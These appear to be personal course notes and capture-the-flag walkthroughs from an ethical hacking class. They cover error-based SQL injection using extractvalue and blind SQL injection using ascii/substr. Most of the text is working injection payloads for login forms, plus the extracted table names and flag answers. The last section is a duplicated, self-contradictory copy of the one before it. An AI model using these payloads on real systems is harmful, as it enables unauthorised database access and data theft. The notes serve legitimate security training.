Segfault ethical hacking week 7

 

Error Based SQL Injection

1) If the SQL query results are directly displayed on the screen → Union SQLi

2) If an error message is output → Error-Based SQLi

        : Utilizing error messages to extract data:

            (1) Logic Error

            (2) SQL Error

1) Syntax Error vs. Logic Error

• Compilation Process: When executing code, a compilation process occurs.
• Syntax Error: If a syntax error occurs, the code will not execute.
• SQL Syntax Error: Generally not useful for extracting data.
• Data Extraction: The SELECT statement must be used to retrieve data.

2) Logic Error

• SQL Error: Errors occurring due to incorrect SQL syntax can be exploited using Error-Based SQLi.
• Error Message Injection: The goal is to manipulate the error message so that it displays a SELECT query result.

Tips for Inducing Logic Errors

• Server behavior varies, requiring individual research for effective exploitation.

Extractvalue Function

Extractvalue('XML text', 'XML expression')

Example injection:

___' and extractvalue('1', concat(0x3a, (select '____'))) and '1'='1

• Replace ____ with the desired SELECT statement to extract its result.
• Special symbols must be included to trigger an error.

Concat Function

• Usage: Combines strings together.

concat('hello', 'test') -> hellotest concat(0x3a, 'test') -> :test

• Hexadecimal Representation:

• 0x3a represents :

Extractvalue Function Characteristics

• Requires special characters like : to cause an error and display data.

This method takes advantage of error messages to extract sensitive information from the database by carefully crafting SQL queries. If you're looking for further explanations or practical examples, let me know!

Error-Based SQL Injection Steps

1. Identify SQL Injection Point
• Check if SQL errors are displayed on the screen.
2. Error Output Function
• Use extractvalue to trigger an error and extract data.
3. Construct Attack Format

___' and extractvalue('1', concat(0x3a, (select '____'))) and '1'='1

Insert the desired query in place of ____ to retrieve data.

4. Retrieve Database Name
   Insert: select database()
5. Retrieve Table Name

select table_name from information_schema.tables where table_schema = '_________' limit 1,1

6. Retrieve Column Name

select column_name from information_schema.columns where table_name='____'

7. Retrieve name Column from game_table

        select name from game limit 0,1

Blind SQL Injection

1. If SQL query results are displayed on the screen → Union SQLi
2. If an error message is shown → Error-Based SQLi
3. Blind SQLi

• Used in cases where query results are not visible, such as login pages or ID duplication checks.
• Extracts data by analyzing differences in true/false responses.

Let me know if you'd like a deeper breakdown of any of these methods

Blind SQLi Process

1. Identify SQL Injection Point

• Test by inserting AND conditions:

normaltic' and '1'='1 -- True normaltic' and '1'='2 -- False

• Verify if the response changes based on true/false conditions.

2. Check if SELECT Statements Can Be Used

normaltic' and ('1'='1') and '1'='1 normaltic' and ((select 'test')='test') and '1'='1

• Ensure SELECT statements are not filtered.

3. Construct Attack Format

        _____' and (substr((__SQL__), 1, 1) and '1'='1

• substr() extracts characters from a string:

substr('test', 1, 1) → 't' substr('test', 1, 2) → 'te'

• Convert characters into numbers using ASCII codes:

ascii('a') → 97 ascii(substr((___SQL__), 1, 1)) > 0

• Example format:

_____' and (ascii(substr((___SQL__), 1, 1)) > 0) and '1'='1

• Test values from 33 to 127, inputting them one by one to extract each letter.
• Use Burp Suite's Repeater tool to verify each step 
  
  

4. Extract Database Name

    select database()

5. Retrieve Table Names

    select table_name from information_schema.tables where table_schema = '_________'

6. Retrieve Column Names

    select column_name from information_schema.columns where table_name='____'

7. Extract the name Column from game_table

    select name from game limit 0,1

Error Based SQLi CTF

1. Find the SQLi point

Check if SQL errors are displayed on the screen.

2. Error-based output function

Use: extractvalue

3. Create the attack format

Example injection:

normaltic' and extractvalue('1', concat(0x3a, (select 'normaltic'))) and '1'='1

4. Extract the Database Name

Use:

select database()

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1

Assume the database name is: errSqli

5. Get Table Names

Query:

select table_name from information_schema.tables where table_schema = 'errSqli'

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'errSqli' limit 1,1))) and '1'='1

Sample result by index:

• flagTable (0,1)

• member (1,1)

• plusFlag_Table (2,1)

6. Get Column Names

Query:

select column_name from information_schema.columns where table_name='flagTable' limit 0,1

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flagTable' limit 0,1))) and '1'='1

Sample result by index:

• idx (0,1)

• flag (1,1)

7. Extract values from the flagTable, column flag

Query:

select flag from flagTable limit 0, 1

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable flagTable limit 0, 1))) and '1'='1

Blind SQLi CTF

1. Find the SQL Injection Point

• normaltic' and '1'='1 → True

• normaltic' and '1'='2 → False

2. Check if SELECT statements are usable

• Injection:

normaltic' and ((select 'test')='test') and '1'='1

3. Create the Blind SQLi Attack Format

• Injection to check if the ASCII value of the first character of a string is greater than 70:

normaltic' and (ascii(substr((select 'normaltic'), 1, 1)) > 70) and '1'='1

4. Extract Database Name

• Query:

select database()

• Injection format:

normaltic' and (ascii(substr((select database()), 1, 1)) > 0) and '1'='1

Retrieved characters:

1. 98 → b

2. 108 → l

3. 105 → i

4. 110 → n

5. 100 → d

6. 83 → S

7. 113 → q

8. 108 → l

9. 105 → i

10. X → end

→ Database name is blindSqli

5. Extract Table Name

• Query:

select table_name from information_schema.tables where table_schema = 'blindSqli'

• Injection format:

normaltic' and (ascii(substr((select table_name from information_schema.tables where table_schema = 'blindSqli' limit 0, 1), 1, 1)) > 0) and '1'='1

Retrieved characters:

1. 102 → f

2. 108 → l

3. 97 → a

4. 103 → g

5. 84 → T

6. 97 → a

7. 98 → b

8. 108 → l

9. 101 → e

10. X → end

→ Table name is flagTable

6. Extract Column Names

• Query:

select column_name from information_schema.columns where table_name='flagTable'

• Injection format:

normaltic' and (ascii(substr((select column_name from information_schema.columns where table_name='flagTable' limit 0, 1), 1, 1)) > 0) and '1'='1

limit 0,1 → idx

1. 105 → i

2. 100 → d

3. 120 → x

4. X → end

limit 1,1 → flag

1. 102 → f

2. 108 → l

3. 97 → a

4. 103 → g

5. X → end

→ Column names are idx and flag

7. Extract Data from flag Column in flagTable

• Query:

select flag from flagTable limit 0, 1

• Injection format:

normaltic' and (ascii(substr((select flag from flagTable limit 0, 1), 1, 1)) > 0) and '1'='1

1. 115 → s

2. 101 → e

3. 103 → g

4. 102 → f

5. 97 → a

6. 117 → u

7. 108 → l

8. 116 → t

9. 123 → {

10. 67 → C

11. 111 → o

12. 110 → n

13. 103 → g

14. 114 → r

15. 97 → a

16. 116 → t

17. 122 → z

18. 95 → _

19. 102 → f

20. 105 → i

21. 114 → r

22. 115 → s

23. 116 → t

24. 66 → B

25. 108 → l

26. 105 → i

27. 110 → n

28. 100 → d

29. 83 → S

30. 113 → q

31. 108 → l

32. 105 → i

33. 125 → }

 

flag is segfault{Congratz_firstBlindSqli}

 

SQL Injection 3

1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 : login seccess

    2) Find DB Name

    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1

        DB name : sqli_2

    3) Find Table Name

    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2' limit 0,1))) and '1'='1

    Table name : flag_table

    4) Find Column name

    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 0,1))) and '1'='1

    Column name : flag

    5)
normaltic' and extractvalue('1', concat(0x3a, (select flag from flag_table limit 0, 1))) and '1'='1

   

SQL Injection 4

1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 : login seccess 

    2) Find DB Name

    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1

        DB name : sqli_2_1

    3) Find Table Name

    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2_1' limit 0,1))) and '1'='1

    Table name : flag_table

    4) Find Column name

    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 0,1))) and '1'='1

    Column name : flag1

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 1,1))) and '1'='1

    Column name : flag2

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 2,1))) and '1'='1

    Column name : flag3

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 3,1))) and '1'='1

    Column name : flag4

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 4,1))) and '1'='1

    Column name : flag5

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 5,1))) and '1'='1

    Column name : flag6

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 6,1))) and '1'='1

    Column name : flag7

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 7,1))) and '1'='1

    Column name : flag8

    5)
normaltic' and extractvalue('1', concat(0x3a, (select flag1 from flag_table limit 0, 1))) and '1'='1

   

normaltic' and extractvalue('1', concat(0x3a, (select flag2 from flag_table limit 0, 1))) and '1'='1

normaltic' and extractvalue('1', concat(0x3a, (select flag3 from flag_table limit 0, 1))) and '1'='1

normaltic' and extractvalue('1', concat(0x3a, (select flag4 from flag_table limit 0, 1))) and '1'='1

normaltic' and extractvalue('1', concat(0x3a, (select flag5 from flag_table limit 0, 1))) and '1'='1

normaltic' and extractvalue('1', concat(0x3a, (select flag6 from flag_table limit 0, 1))) and '1'='1

normaltic' and extractvalue('1', concat(0x3a, (select flag7 from flag_table limit 0, 1))) and '1'='1

normaltic' and extractvalue('1', concat(0x3a, (select flag8 from flag_table limit 0, 1))) and '1'='1

flag : segfault{1you_must_concat_this_string_goodjob}

SQL Injection 5

1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 : login seccess 

    2) Find DB Name

    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1

        DB name : sqli_2_2

    3) Find Table Name

    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2_2' limit 0,1))) and '1'='1

    Table name : flagTable_this

    4) Find Column name

    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flagTable_this' limit 0,1))) and '1'='1

    Column name :

        0, 1 = idx

        1, 1 = flag

5)

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable_this limit 0, 1))) and '1'='1

start 0 to 13

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable_this limit 13, 1))) and '1'='1

flag : segfault{manyData_youFind}

SQL Injection 5

1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 : login seccess 

2) Find DB Name

    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1

        

I can not use Error based SQLi. 

I need to change to Blind SQLi

    3) Find Table Name

    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2_2' limit 0,1))) and '1'='1

    Table name : flagTable_this

    4) Find Column name

    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flagTable_this' limit 0,1))) and '1'='1

    Column name :

        0, 1 = idx

        1, 1 = flag

5)

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable_this limit 0, 1))) and '1'='1

start 0 to 13

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable_this limit 13, 1))) and '1'='1

flag : segfault{manyData_youFind}